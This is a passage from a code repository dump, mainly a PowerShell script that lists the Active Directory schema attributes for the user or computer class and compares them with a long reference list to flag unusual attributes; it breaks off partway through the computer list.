$Error[0].Exception.InnerException.Status\r\n            }\r\n        }\r\n\r\n        $Result = @{ Status = $WebStatus;\r\n                     URL = $WebTarget}\r\n\r\n        $ScanObject = New-Object -TypeName PSObject -Property $Result\r\n\r\n        Write-Output $ScanObject\r\n    }\r\n}\r\n"
  },
  {
    "path": "Recon/Invoke-CompareAttributesForClass.ps1",
    "content": "﻿function Get-AllAttributesForClass\n{<#\n.Synopsis\n   Gets all AD Schema attributes for class\n.DESCRIPTION\n   This function will get all attributes for a class from AD.\n.EXAMPLE\n   PS C:\\> Get-AllAttributesForAClass -class user\n.EXAMPLE\n   PS C:\\> Get-AllAttributesForAClass -class computer\n#>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory=$true)]\n        [String]\n        $Class\n    )\n\n    Process {\n        #Custom object\n        $ListOfAttributesFromAD = @()\n\n        #lets get all classes and store in a variable.\n        $NextClass = $Class\n        $AllClasses = Do\n        {\n            $CurrentClass = $NextClass\n            $NextClass = Get-ADObject -SearchBase \"$((Get-ADRootDSE).SchemaNamingContext)\" -Filter {lDAPDisplayName -eq $NextClass} -properties subClassOf |Select-Object -ExpandProperty subClassOf\n            $CurrentClass\n        }\n        While($CurrentClass -ne $NextClass)\n        #Now that we have our classes in $allClasses lets turn to the attributes\n        $attributAttributes = 'MayContain','MustContain','systemMayContain','systemMustContain'\n        Write-verbose \"Attempting to find all attributes for the AD Object: $($ADObj.Name)\"\n        $AllAttributes = ForEach ($Class in $AllClasses)\n        {\n            $ClassInfo = Get-ADObject -SearchBase \"$((Get-ADRootDSE).SchemaNamingContext)\" -Filter {lDAPDisplayName -eq $Class} -properties $attributAttributes \n            ForEach ($attribute in $attributAttributes)\n            {\n                $ListOfAttributesFromAD += $ClassInfo.$attribute\n                $ClassInfo.$attribute\n            }\n        }\n    $ListOfAttributesAD = $ListOfAttributesFromAD | Sort-Object -Unique\n    write-output $ListOfAttributesAD\n    }\n    End\n    {\n    }\n}\n\n\nfunction Invoke-CompareAttributesForClass\n{\n<#\n.Synopsis\n    Author: @oddvarmoe\n    Required Dependencies: Search-ADAccounts, Set-ADComputer, Get-ADForest, Get-ADDomain,\n    Optional Dependencies: None\n    Compares list of attributes with active attributes in Active Directory. Currently only works with user and computer class.\n\n.DESCRIPTION\n    Compares list of attributes with active attributes in Active Directory.\n    This function is used to spot unusal attributes.\n    \n    Example where an attribute is found in AD and not in compare list:\n    InputObject                   SideIndicator                                              \n    -----------                   -------------                                              \n    TopSecretAttribute            =>                                                         \n\n\n.EXAMPLE\n    PS C:\\> Invoke-CompareAttributesForClass -Class user\n\n.EXAMPLE\n    PS C:\\> Invoke-CompareAttributesForClass -Class computer\n#>\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory=$true)]\n        [ValidateSet(\"User\",\"Computer\")]\n        [String]\n        $Class\n    )\n\n    Process {\n        #https://msdn.microsoft.com/en-us/library/ms683980(v=vs.85).aspx\n        #List of attributes generated from demo AD with Exchange schema changes on Server 2016 DC\n        #TODO: Attributes based on AD Domain level or Schema version.\n        if($Class -eq \"user\"){\n                $UserAttributeListFromAD = Get-AllAttributesForClass -Class user\n\n        $UserAttributelist = @(\n        \"accountExpires\",\n        \"aCSPolicyName\",\n        \"adminCount\",\n        \"adminDescription\",\n        \"adminDisplayName\",\n        \"allowedAttributes\",\n        \"allowedAttributesEffective\",\n        \"allowedChildClasses\",\n        \"allowedChildClassesEffective\",\n        \"assistant\",\n        \"attributeCertificateAttribute\",\n        \"audio\",\n        \"badPasswordTime\",\n        \"badPwdCount\",\n        \"bridgeheadServerListBL\",\n        \"businessCategory\",\n        \"businessRoles\",\n        \"c\",\n        \"canonicalName\",\n        \"carLicense\",\n        \"cn\",\n        \"co\",\n        \"codePage\",\n        \"comment\",\n        \"company\",\n        \"controlAccessRights\",\n        \"countryCode\",\n        \"createTimeStamp\",\n        \"dBCSPwd\",\n        \"defaultClassStore\",\n        \"department\",\n        \"departmentNumber\",\n        \"description\",\n        \"desktopProfile\",\n        \"destinationIndicator\",\n        \"directReports\",\n        \"displayName\",\n        \"displayNamePrintable\",\n        \"distinguishedName\",\n        \"division\",\n        \"dSASignature\",\n        \"dSCorePropagationData\",\n        \"dynamicLDAPServer\",\n        \"employeeID\",\n        \"employeeNumber\",\n        \"employeeType\",\n        \"extensionName\",\n        \"facsimileTelephoneNumber\",\n        \"flags\",\n        \"fromEntry\",\n        \"frsComputerReferenceBL\",\n        \"fRSMemberReferenceBL\",\n        \"fSMORoleOwner\",\n        \"generationQualifier\",\n        \"givenName\",\n        \"groupMembershipSAM\",\n        \"groupPriority\",\n        \"groupsToIgnore\",\n        \"homeDirectory\",\n        \"homeDrive\",\n        \"homePhone\",\n        \"homePostalAddress\",\n        \"houseIdentifier\",\n        \"initials\",\n        \"instanceType\",\n        \"internationalISDNNumber\",\n        \"ipPhone\",\n        \"isCriticalSystemObject\",\n        \"isDeleted\",\n        \"isPrivilegeHolder\",\n        \"isRecycled\",\n        \"jpegPhoto\",\n        \"kMServer\",\n        \"l\",\n        \"labeledURI\",\n        \"lastKnownParent\",\n        \"lastLogoff\",\n        \"lastLogon\",\n        \"lastLogonTimestamp\",\n        \"lmPwdHistory\",\n        \"localeID\",\n        \"lockoutTime\",\n        \"logonCount\",\n        \"logonHours\",\n        \"logonWorkstation\",\n        \"mail\",\n        \"managedObjects\",\n        \"manager\",\n        \"masteredBy\",\n        \"maxStorage\",\n        \"memberOf\",\n        \"mhsORAddress\",\n        \"middleName\",\n        \"mobile\",\n        \"modifyTimeStamp\",\n        \"msCOM-PartitionSetLink\",\n        \"msCOM-UserLink\",\n        \"msCOM-UserPartitionSetLink\",\n        \"msDFSR-ComputerReferenceBL\",\n        \"msDFSR-MemberReferenceBL\",\n        \"msDRM-IdentityCertificate\",\n        \"msDS-AllowedToActOnBehalfOfOtherIdentity\",\n        \"msDS-AllowedToDelegateTo\",\n        \"msDS-Approx-Immed-Subordinates\",\n        \"msDS-AssignedAuthNPolicy\",\n        \"msDS-AssignedAuthNPolicySilo\",\n        \"msDS-AuthenticatedAtDC\",\n        \"msDS-AuthenticatedToAccountlist\",\n        \"msDS-AuthNPolicySiloMembersBL\",\n        \"msDS-Cached-Membership\",\n        \"msDS-Cached-Membership-Time-Stamp\",\n        \"msDS-ClaimSharesPossibleValuesWithBL\",\n        \"msDS-CloudAnchor\",\n        \"mS-DS-ConsistencyChildCount\",\n        \"mS-DS-ConsistencyGuid\",\n        \"mS-DS-CreatorSID\",\n        \"msDS-EnabledFeatureBL\",\n        \"msDS-FailedInteractiveLogonCount\",\n        \"msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon\",\n        \"msDS-HABSeniorityIndex\",\n        \"msDS-HostServiceAccountBL\",\n        \"msDS-IsDomainFor\",\n        \"msDS-IsFullReplicaFor\",\n        \"msDS-IsPartialReplicaFor\",\n        \"msDS-IsPrimaryComputerFor\",\n        \"msDS-KeyCredentialLink\",\n        \"msDS-KeyPrincipalBL\",\n        \"msDS-KrbTgtLinkBl\",\n        \"msDS-LastFailedInteractiveLogonTime\",\n        \"msDS-LastKnownRDN\",\n        \"msDS-LastSuccessfulInteractiveLogonTime\",\n        \"msDS-LocalEffectiveDeletionTime\",\n        \"msDS-LocalEffectiveRecycleTime\",\n        \"msDs-masteredBy\",\n        \"msds-memberOfTransitive\",\n        \"msDS-MembersForAzRoleBL\",\n        \"msDS-MembersOfResourcePropertyListBL\",\n        \"msds-memberTransitive\",\n        \"msDS-NCReplCursors\",\n        \"msDS-NCReplInboundNeighbors\",\n        \"msDS-NCReplOutboundNeighbors\",\n        \"msDS-NC-RO-Replica-Locations-BL\",\n        \"msDS-NcType\",\n        \"msDS-NonMembersBL\",\n        \"msDS-ObjectReferenceBL\",\n        \"msDS-ObjectSoa\",\n        \"msDS-OIDToGroupLinkBl\",\n        \"msDS-OperationsForAzRoleBL\",\n        \"msDS-OperationsForAzTaskBL\",\n        \"msDS-parentdistname\",\n        \"msDS-PhoneticCompanyName\",\n        \"msDS-PhoneticDepartment\",\n        \"msDS-PhoneticDisplayName\",\n        \"msDS-PhoneticFirstName\",\n        \"msDS-PhoneticLastName\",\n        \"msDS-PrimaryComputer\",\n        \"msDS-PrincipalName\",\n        \"msDS-PSOApplied\",\n        \"msDS-ReplAttributeMetaData\",\n        \"msDS-ReplValueMetaData\",\n        \"msDS-ReplValueMetaDataExt\",\n        \"msDS-ResultantPSO\",\n        \"msDS-RevealedDSAs\",\n        \"msDS-RevealedListBL\",\n        \"msDS-SecondaryKrbTgtNumber\",\n        \"msDS-Site-Affinity\",\n        \"msDS-SourceAnchor\",\n        \"msDS-SourceObjectDN\",\n        \"msDS-SupportedEncryptionTypes\",\n        \"msDS-SyncServerUrl\",\n        \"msDS-TasksForAzRoleBL\",\n        \"msDS-TasksForAzTaskBL\",\n        \"msDS-TDOEgressBL\",\n        \"msDS-TDOIngressBL\",\n        \"msDS-User-Account-Control-Computed\",\n        \"msDS-UserPasswordExpiryTimeComputed\",\n        \"msDS-ValueTypeReferenceBL\",\n        \"msExchAcceptedDomainBL\",\n        \"msExchAccountForestBL\",\n        \"msExchArchiveDatabaseBL\",\n        \"msExchAssociatedAcceptedDomainBL\",\n        \"msExchAuthPolicyBL\",\n        \"msExchAuxMailboxParentObjectIdBL\",\n        \"msExchAvailabilityOrgWideAccountBL\",\n        \"msExchAvailabilityPerUserAccountBL\",\n        \"msExchCatchAllRecipientBL\",\n        \"msExchConferenceMailboxBL\",\n        \"msExchControllingZone\",\n        \"msExchDataEncryptionPolicyBL\",\n        \"msExchDelegateListBL\",\n        \"msExchDeviceAccessControlRuleBL\",\n        \"msExchEvictedMemebersBL\",\n        \"msExchHABRootDepartmentBL\",\n        \"msExchHouseIdentifier\",\n        \"msExchHygieneConfigurationMalwareBL\",\n        \"msExchHygieneConfigurationSpamBL\",\n        \"msExchIMAPOWAURLPrefixOverride\",\n        \"msExchIntendedMailboxPlanBL\",\n        \"msExchMailboxMoveSourceArchiveMDBBL\",\n        \"msExchMailboxMoveSourceMDBBL\",\n        \"msExchMailboxMoveSourceUserBL\",\n        \"msExchMailboxMoveStorageMDBBL\",\n        \"msExchMailboxMoveTargetArchiveMDBBL\",\n        \"msExchMailboxMoveTargetMDBBL\",\n        \"msExchMailboxMoveTargetUserBL\",\n        \"msExchMDBAvailabilityGroupConfigurationBL\",\n        \"msExchMobileRemoteDocumentsAllowedServersBL\",\n        \"msExchMobileRemoteDocumentsBlockedServersBL\",\n        \"msExchMobileRemoteDocumentsInternalDomainSuffixListBL\",\n        \"msExchMultiMailboxDatabasesBL\",\n        \"msExchMultiMailboxLocationsBL\",\n        \"msExchOABGeneratingMailboxBL\",\n        \"msExchOrganizationsAddressBookRootsBL\",\n        \"msExchOrganizationsGlobalAddressListsBL\",\n        \"msExchOrganizationsTemplateRootsBL\",\n        \"msExchOriginatingForest\",\n        \"msExchOWAAllowedFileTypesBL\",\n        \"msExchOWAAllowedMimeTypesBL\",\n        \"msExchOWABlockedFileTypesBL\",\n        \"msExchOWABlockedMIMETypesBL\",\n        \"msExchOWAForceSaveFileTypesBL\",\n        \"msExchOWAForceSaveMIMETypesBL\",\n        \"msExchOWARemoteDocumentsAllowedServersBL\",\n        \"msExchOWARemoteDocumentsBlockedServersBL\",\n        \"msExchOWARemoteDocumentsInternalDomainSuffixListBL\",\n        \"msExchOWATranscodingFileTypesBL\",\n        \"msExchOWATranscodingMimeTypesBL\",\n        \"msExchParentPlanBL\",\n        \"msExchQueryBaseDN\",\n        \"msExchRBACPolicyBL\",\n        \"msExchResourceGUID\",\n        \"msExchResourceProperties\",\n        \"msExchRMSComputerAccountsBL\",\n        \"msExchServerAssociationBL\",\n        \"msExchServerSiteBL\",\n        \"msExchSMTPReceiveDefaultAcceptedDomainBL\",\n        \"msExchSupervisionDLBL\",\n        \"msExchSupervisionOneOffBL\",\n        \"msExchSupervisionUserBL\",\n        \"msExchTransportRuleTargetBL\",\n        \"msExchTrustedDomainBL\",\n        \"msExchUGMemberBL\",\n        \"msExchUserBL\",\n        \"msExchUserCulture\",\n        \"msIIS-FTPDir\",\n        \"msIIS-FTPRoot\",\n        \"mSMQDigests\",\n        \"mSMQDigestsMig\",\n        \"mSMQSignCertificates\",\n        \"mSMQSignCertificatesMig\",\n        \"msNPAllowDialin\",\n        \"msNPCallingStationID\",\n        \"msNPSavedCallingStationID\",\n        \"msOrg-LeadersBL\",\n        \"msPKIAccountCredentials\",\n        \"msPKI-CredentialRoamingTokens\",\n        \"msPKIDPAPIMasterKeys\",\n        \"msPKIRoamingTimeStamp\",\n        \"msRADIUSCallbackNumber\",\n        \"msRADIUS-FramedInterfaceId\",\n        \"msRADIUSFramedIPAddress\",\n        \"msRADIUS-FramedIpv6Prefix\",\n        \"msRADIUS-FramedIpv6Route\",\n        \"msRADIUSFramedRoute\",\n        \"msRADIUS-SavedFramedInterfaceId\",\n        \"msRADIUS-SavedFramedIpv6Prefix\",\n        \"msRADIUS-SavedFramedIpv6Route\",\n        \"msRADIUSServiceType\",\n        \"msRASSavedCallbackNumber\",\n        \"msRASSavedFramedIPAddress\",\n        \"msRASSavedFramedRoute\",\n        \"msRTCSIP-AcpInfo\",\n        \"msRTCSIP-ApplicationOptions\",\n        \"msRTCSIP-ArchivingEnabled\",\n        \"msRTCSIP-DeploymentLocator\",\n        \"msRTCSIP-FederationEnabled\",\n        \"msRTCSIP-GroupingID\",\n        \"msRTCSIP-InternetAccessEnabled\",\n        \"msRTCSIP-Line\",\n        \"msRTCSIP-LineServer\",\n        \"msRTCSIP-OptionFlags\",\n        \"msRTCSIP-OriginatorSid\",\n        \"msRTCSIP-OwnerUrn\",\n        \"msRTCSIP-PrimaryHomeServer\",\n        \"msRTCSIP-PrimaryUserAddress\",\n        \"msRTCSIP-PrivateLine\",\n        \"msRTCSIP-TargetHomeServer\",\n        \"msRTCSIP-TargetUserPolicies\",\n        \"msRTCSIP-TenantId\",\n        \"msRTCSIP-UserEnabled\",\n        \"msRTCSIP-UserExtension\",\n        \"msRTCSIP-UserLocationProfile\",\n        \"msRTCSIP-UserPolicies\",\n        \"msRTCSIP-UserPolicy\",\n        \"msRTCSIP-UserRoutingGroupId\",\n        \"msSFU30Name\",\n        \"msSFU30NisDomain\",\n        \"msSFU30PosixMemberOf\",\n        \"msTSAllowLogon\",\n        \"msTSBrokenConnectionAction\",\n        \"msTSConnectClientDrives\",\n        \"msTSConnectPrinterDrives\",\n        \"msTSDefaultToMainPrinter\",\n        \"msTSExpireDate\",\n        \"msTSExpireDate2\",\n        \"msTSExpireDate3\",\n        \"msTSExpireDate4\",\n        \"msTSHomeDirectory\",\n        \"msTSHomeDrive\",\n        \"msTSInitialProgram\",\n        \"msTSLicenseVersion\",\n        \"msTSLicenseVersion2\",\n        \"msTSLicenseVersion3\",\n        \"msTSLicenseVersion4\",\n        \"msTSLSProperty01\",\n        \"msTSLSProperty02\",\n        \"msTSManagingLS\",\n        \"msTSManagingLS2\",\n        \"msTSManagingLS3\",\n        \"msTSManagingLS4\",\n        \"msTSMaxConnectionTime\",\n        \"msTSMaxDisconnectionTime\",\n        \"msTSMaxIdleTime\",\n        \"msTSPrimaryDesktop\",\n        \"msTSProfilePath\",\n        \"msTSProperty01\",\n        \"msTSProperty02\",\n        \"msTSReconnectionAction\",\n        \"msTSRemoteControl\",\n        \"msTSSecondaryDesktops\",\n        \"msTSWorkDirectory\",\n        \"name\",\n        \"netbootSCPBL\",\n        \"networkAddress\",\n        \"nonSecurityMemberBL\",\n        \"ntPwdHistory\",\n        \"nTSecurityDescriptor\",\n        \"o\",\n        \"objectCategory\",\n        \"objectClass\",\n        \"objectGUID\",\n        \"objectVersion\",\n        \"operatorCount\",\n        \"otherFacsimileTelephoneNumber\",\n        \"otherHomePhone\",\n        \"otherIpPhone\",\n        \"otherLoginWorkstations\",\n        \"otherMailbox\",\n        \"otherMobile\",\n        \"otherPager\",\n        \"otherTelephone\",\n        \"otherWellKnownObjects\",\n        \"ou\",\n        \"ownerBL\",\n        \"pager\",\n        \"partialAttributeDeletionList\",\n        \"partialAttributeSet\",\n        \"personalPager\",\n        \"personalTitle\",\n        \"photo\",\n        \"physicalDeliveryOfficeName\",\n        \"possibleInferiors\",\n        \"postalAddress\",\n        \"postalCode\",\n        \"postOfficeBox\",\n        \"preferredDeliveryMethod\",\n        \"preferredLanguage\",\n        \"preferredOU\",\n        \"primaryGroupID\",\n        \"primaryInternationalISDNNumber\",\n        \"primaryTelexNumber\",\n        \"profilePath\",\n        \"proxiedObjectName\",\n        \"proxyAddresses\",\n        \"pwdLastSet\",\n        \"queryPolicyBL\",\n        \"registeredAddress\",\n        \"replPropertyMetaData\",\n        \"replUpToDateVector\",\n        \"repsFrom\",\n        \"repsTo\",\n        \"revision\",\n        \"roomNumber\",\n        \"scriptPath\",\n        \"sDRightsEffective\",\n        \"secretary\",\n        \"seeAlso\",\n        \"serialNumber\",\n        \"serverReferenceBL\",\n        \"servicePrincipalName\",\n        \"showInAdvancedViewOnly\",\n        \"siteObjectBL\",\n        \"sn\",\n        \"st\",\n        \"street\",\n        \"streetAddress\",\n        \"structuralObjectClass\",\n        \"subRefs\",\n        \"subSchemaSubEntry\",\n        \"systemFlags\",\n        \"telephoneAssistant\",\n        \"telephoneNumber\",\n        \"teletexTerminalIdentifier\",\n        \"telexNumber\",\n        \"terminalServer\",\n        \"thumbnailLogo\",\n        \"thumbnailPhoto\",\n        \"title\",\n        \"uid\",\n        \"unicodePwd\",\n        \"url\",\n        \"userAccountControl\",\n        \"userCertificate\",\n        \"userParameters\",\n        \"userPassword\",\n        \"userPKCS12\",\n        \"userPrincipalName\",\n        \"userSharedFolder\",\n        \"userSharedFolderOther\",\n        \"userSMIMECertificate\",\n        \"userWorkstations\",\n        \"uSNChanged\",\n        \"uSNCreated\",\n        \"uSNDSALastObjRemoved\",\n        \"USNIntersite\",\n        \"uSNLastObjRem\",\n        \"uSNSource\",\n        \"wbemPath\",\n        \"wellKnownObjects\",\n        \"whenChanged\",\n        \"whenCreated\",\n        \"wWWHomePage\",\n        \"x121Address\",\n        \"x500uniqueIdentifier\"\n        )\n    $Compare = Compare-Object -ReferenceObject $UserAttributelist -DifferenceObject $UserAttributeListFromAD\n    Write-Output $Compare\n        }\n        \n        if($Class -eq \"computer\"){\n                $ComputerAttributeListFromAD = Get-AllAttributesForClass -Class computer\n        \n        $ComputerAttributeList = @(\n        \"accountExpires\",\n        \"aCSPolicyName\",\n        \"adminCount\",\n        \"adminDescription\",\n        \"adminDisplayName\",\n        \"allowedAttributes\",\n        \"allowedAttributesEffective\",\n        \"allowedChildClasses\",\n        \"allowedChildClassesEffective\",\n        \"assistant\",\n        \"attributeCertificateAttribute\",\n        \"audio\",\n        \"badPasswordTime\",\n        \"badPwdCount\",\n        \"bridgeheadServerListBL\",\n        \"businessCategory\",\n        \"businessRoles\",\n        \"c\",\n        \"canonicalName\",\n        \"carLicense\",\n        \"catalogs\",\n        \"cn\",\n        \"co\",\n        \"codePage\",\n        \"comment\",\n        \"company\",\n        \"controlAccessRights\",\n        \"countryCode\",\n        \"createTimeStamp\",\n        \"dBCSPwd\",\n        \"defaultClassStore\",\n        \"defaultLocalPolicyObject\",\n        \"department\",\n        \"departmentNumber\",\n        \"description\",\n        \"desktopProfile\",\n        \"destinationIndicator\",\n        \"directReports\",\n        \"displayName\",\n        \"displayNamePrintable\",\n        \"distinguishedName\",\n        \"division\",\n        \"dNSHostName\",\n        \"dSASignature\",\n        \"dSCorePropagationData\",\n        \"dynamicLDAPServer\",\n        \"employeeID\",\n        \"employeeNumber\",\n        \"employeeType\",\n        \"extensionName\",\n        \"facsimileTelephoneNumber\",\n        \"flags\",\n        \"fromEntry\",\n        \"frsComputerReferenceBL\",\n        \"fRSMemberReferenceBL\",\n        \"fSMORoleOwner\",\n        \"generationQualifier\",\n        \"givenName\",\n        \"groupMembershipSAM\",\n        \"groupPriority\",\n        \"groupsToIgnore\",\n        \"homeDirectory\",\n        \"homeDrive\",\n        \"homePhone\",\n        \"homePostalAddress\",\n        \"houseIdentifier\",\n        \"initials\",\n        \"instanceType\",\n        \"internationalISDNNumber\",\n        \"ipPhone\",\n        \"isCriticalSystemObject\",\n        \"isDeleted\",\n        \"isPrivilegeHolder\",\n        \"isRecycled\",\n        \"jpegPhoto\",\n        \"kMServer\",\n        \"l\",\n        \"labeledURI\",\n        \"lastKnownParent\",\n        \"lastLogoff\",\n        \"lastLogon\",\n        \"lastLogonTimestamp\",\n        \"lmPwdHistory\",\n        \"localeID\",\n        \"localPolicyFlags\",\n        \"location\",\n        \"lockoutTime\",\n        \"logonCount\",\n        \"logonHours\",\n        \"logonWorkstation\",\n        \"logRolloverInterval\",\n        \"machineRole\",\n        \"mail\",\n        \"managedBy\",\n        \"managedObjects\",\n        \"manager\",\n        \"masteredBy\",\n        \"maxStorage\",\n        \"memberOf\",\n        \"mhsORAddress\",\n        \"middleName\",\n        \"mobile\",\n        \"modifyTimeStamp\",\n        \"monitoredConfigurations\",\n        \"monitoredServices\",\n        \"monitoringAvailabilityStyle\",\n        \"monitoringAvailabilityWindow\",\n        \"monitoringCachedViaMail\",\n        \"monitoringCachedViaRPC\",\n        \"monitoringMailUpdateInterval\",\n        \"monitoringMailUpdateUnits\",\n        \"monitoringRPCUpdateInterval\",\n        \"monitoringRPCUpdateUnits\",\n        \"msCOM-PartitionSetLink\",\n        \"msCOM-UserLink\",\n        \"msCOM-UserPartitionSetLink\",\n        \"msDFSR-ComputerReferenceBL\",\n        \"msDFSR-MemberReferenceBL\",\n        \"msDRM-IdentityCertificate\",\n        \"msDS-AdditionalDnsHostName\",\n        \"msDS-AdditionalSamAccountName\",\n        \"msDS-AllowedToActOnBehalfOfOtherIdentity\",\n        \"msDS-AllowedToDelegateTo\",\n        \"msDS-Approx-Immed-Subordinates\",\n        \"msDS-AssignedAuthNPolicy\",\n        \"msDS-AssignedAuthNPolicySilo\",\n        \"msDS-AuthenticatedAtDC\",\n        \"msDS-AuthenticatedToAccountlist\",\n        \"msDS-AuthNPolicySiloMembersBL\",\n        \"msDS-Cached-Membership\",\n        \"msDS-Cached-Membership-Time-Stamp\",\n        \"msDS-ClaimSharesPossibleValuesWithBL\",\n        \"msDS-CloudAnchor\",\n        \"mS-DS-ConsistencyChildCount\",\n        \"mS-DS-ConsistencyGuid\",\n        \"mS-DS-CreatorSID\",\n        \"msDS-EnabledFeatureBL\",\n        \"msDS-ExecuteScriptPassword\",\n        \"msDS-FailedInteractiveLogonCount\",\n        \"msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon\",\n        \"msDS-GenerationId\",\n        \"msDS-HABSeniorityIndex\",\n        \"msDS-HostServiceAccount\",\n        \"msDS-HostServiceAccountBL\",\n        \"msDS-IsDomainFor\",\n        \"msDS-IsFullReplicaFor\",\n        \"msDS-isGC\",\n        \"msDS-IsPartialReplicaFor\",\n        \"msDS-IsPrimaryComputerFor\",\n        \"msDS-isRODC\",\n        \"msDS-IsUserCachableAtRodc\",\n        \"msDS-KeyCredentialLink\",\n        \"msDS-KeyPrincipalBL\",\n        \"msDS-KrbTgtLink\",\n        \"msDS-KrbTgtLinkBl\",\n        \"msDS-LastFailedInteractiveLogonTime\",\n        \"msDS-LastKnownRDN\",\n        \"msDS-LastSuccessfulInteractiveLogonTime\",\n        \"msDS-LocalEffectiveDeletionTime\",\n        \"msDS-LocalEffectiveRecycleTime\",\n        \"msDs-masteredBy\",\n        \"msds-memberOfTransitive\",\n        \"msDS-MembersForAzRoleBL\",\n        \"msDS-MembersOfResourcePropertyListBL\",\n        \"msds-memberTransitive\",\n        \"msDS-NCReplCursors\",\n        \"msDS-NCReplInboundNeighbors\",\n        \"msDS-NCReplOutboundNeighbors\",\n        \"msDS-NC-RO-Replica-Locations-BL\",\n        \"msDS-NcType\",\n        \"msDS-NeverRevealGroup\",\n        \"msDS-NonMembersBL\",\n        \"msDS-ObjectReferenceBL\",\n        \"msDS-ObjectSoa\",\n        \"msDS-OIDToGroupLinkBl\",\n        \"msDS-OperationsForAzRoleBL\",\n        \"msDS-OperationsForAzTaskBL\",\n        \"msDS-parentdistname\",\n        \"msDS-PhoneticCompanyName\",\n        \"msDS-PhoneticDepartment\",\n        \"msDS-PhoneticDisplayName\",\n        \"msDS-PhoneticFirstName\",\n        \"msDS-PhoneticLastName\",\n        \"msDS-PrimaryComputer\",\n        \"msDS-PrincipalName\",\n        \"msDS-PromotionSettings\",\n        \"msDS-PSOApplied\",\n        \"msDS-ReplAttributeMetaData\",\n        \"msDS-ReplValueMetaData\",\n        \"msDS-ReplValueMetaDataExt\",\n        \"msDS-ResultantPSO\",\n        \"msDS-RevealedDSAs\",\n        \"msDS-RevealedList\",\n        \"msDS-RevealedListBL\",\n        \"msDS-RevealedUsers\",\n        \"msDS-RevealOnDemandGroup\",\n        \"msDS-SecondaryKrbTgtNumber\",\n        \"msDS-Site-Affinity\",\n        \"msDS-SiteName\",\n        \"msDS-SourceAnchor\",\n        \"msDS-SourceObjectDN\",\n        \"msDS-SupportedEncryptionTypes\",\n        \"msDS-SyncServerUrl\",\n        \"msDS-TasksForAzRoleBL\",\n        \"msDS-TasksForAzTaskBL\",\n        \"msDS-TDOEgressBL\",\n        \"msDS-TDOIngressBL\",\n        \"msDS-User-Account-Control-Computed\",\n        \"msDS-UserPasswordExpiryTimeComputed\",\n        \"msDS-ValueTypeReferenceBL\",\n        \"msExchAcceptedDomainBL\",\n        \"msExchAccountForestBL\",\n        \"msExchArchiveDatabaseBL\",\n        \"msExchAssociatedAcceptedDomainBL\",\n        \"msExchAuthPolicyBL\",\n        \"msExchAuxMailboxParentObjectIdBL\",\n        \"msExchAvailabilityOrgWideAccountBL\",\n        \"msExchAvailabilityPerUserAccountBL\",\n        \"msExchCatchAllRecipientBL\",\n        \"msExchComponentStates\",\n        \"msExchConferenceMailboxBL\",\n        \"msExchControllingZone\",\n        \"msExchDataEncryptionPolicyBL\",\n        \"msExchDelegateListBL\",\n        \"msExchDeviceAccessControlRuleBL\",\n        \"msExchEvictedMemebersBL\",\n        \"msExchExchangeServerLink\",\n        \"msExchHABRootDepartmentBL\",\n        \"msExchHouseIdentifier\",\n        \"msExchHygieneConfigurationMalwareBL\",\n        \"msExchHygieneConfigurationSpamBL\",\n        \"msExchIMAPOWAURLPrefixOverride\",\n        \"msExchIntendedMailboxPlanBL\",\n        \"msExchMailboxMoveSourceArchiveMDBBL\",\n        \"msExchMailboxMoveSourceMDBBL\",\n        \"msExchMailboxMoveSourceUserBL\",\n        \"msExchMailboxMoveStorageMDBBL\",\n        \"msExchMailboxMoveTargetArchiveMDBBL\",\n        \"msExchMailboxMoveTargetMDBBL\",\n        \"msExchMailboxMoveTargetUserBL\",\n        \"msExchMDBAvailabilityGroupConfigurationBL\",\n        \"msExchMobileRemoteDocumentsAllowedServersBL\",\n        \"msExchMobileRemoteDocumentsBlockedServersBL\",\n        \"msExchMobileRemoteDocumentsInternalDomainSuffixListBL\",\n        \"msExchMultiMailboxDatabasesBL\",\n        \"msExchMultiMailboxLocationsBL\",\n        \"msExchOABGeneratingMailboxBL\",\n        \"msExchOrganizationsAddressBookRootsBL\",\n        \"msExchOrganizationsGlobalAddressListsBL\",\n        \"msExchOrganizationsTemplateRootsBL\",\n        \"msExchOriginatingForest\",\n        \"msExchOWAAllowedFileTypesBL\",\n        \"msExchOWAAllowedMimeTypesBL\",\n        \"msExchOWABlockedFileTypesBL\",\n        \"msExchOWABlockedMIMETypesBL\",\n        \"msExchOWAForceSaveFileTypesBL\",\n        \"msExchOWAForceSaveMIMETypesBL\",\n        \"msExchOWARemoteDocumentsAllowedServersBL\",\n        \"msExchOWARemoteDocumentsBlockedServersBL\",\n        \"msExchOWARemoteDocumentsInternalDomainSuffixListBL\",\n        \"msExchOWATranscodingFileTypesBL\",\n        \"msExchOWATranscodingMimeTypesBL\",\n        \"msExchParentPlanBL\",\n        \"msExchPolicyList\",\n        \"msExchPolicyOptionList\",\n        \"msExchQueryBaseDN\",\n        \"msExchRBACPolicyBL\",\n        \"msExchResourceGUID\",\n        \"msExchResourceProperties\",\n        \"msExchRMSComputerAccountsBL\",\n        \"msExchServerAssociationBL\",\n        \"msExchServerSiteBL\",\n        \"msExchSMTPReceiveDefaultAcceptedDomainBL\",\n        \"msExchSupervisionDLBL\",\n        \"msExchSupervisionOneOffBL\",\n        \"msExchSupervisionUserBL\",\n        \"msExchTransportRuleTargetBL\",\n        \"msExchTrustedDomainBL\",\n        \"msExchUGMemberBL\",\n        \"msExchUserBL\",\n        \"msExchUserCulture\",\n        \"msIIS-FTPDir\",\n        \"msIIS-FTPRoot\",\n        \"msImaging-HashAlgorithm\",\n        \"msImaging-ThumbprintHash\",\n        \"mSMQDigests\",\n        \"mSMQDigestsMig\",\n        \"mSMQSignCertificates\",\n        \"mSMQSignCertificatesMig\",\n        \"msNPAllowDialin\",\n        \"msNPCallingStationID\",\n        \"msNPSavedCallingStationID\",\n        \"msOrg-LeadersBL\",\n        \"msPKIAccountCredentials\",\n        \"msPKI-CredentialRoamingTokens\",\n        \"msPKIDPAPIMasterKeys\",\n        \"msPKIRoamingTimeStamp\",\n        \"msRADIUSCallbackNumber\",\n        \"msRADIUS-FramedInterfaceId\",\n        \"msRADIUSFramedIPAddress\",\n        \"msRADIUS-FramedIpv6Prefix\",\n        \"msRADIUS-FramedIpv6Route\",\n        \"msRADIUSFramedRoute\",\n        \"msRADIUS-SavedFramedInterfaceId\",\n        \"msRADIUS-SavedFramedIpv6Prefix\",\n        \"msRADIUS-SavedFramedIpv6Route\",\n        \"msRADIUSServiceType\",\n        \"msRASSavedCallbackNumber\",\n        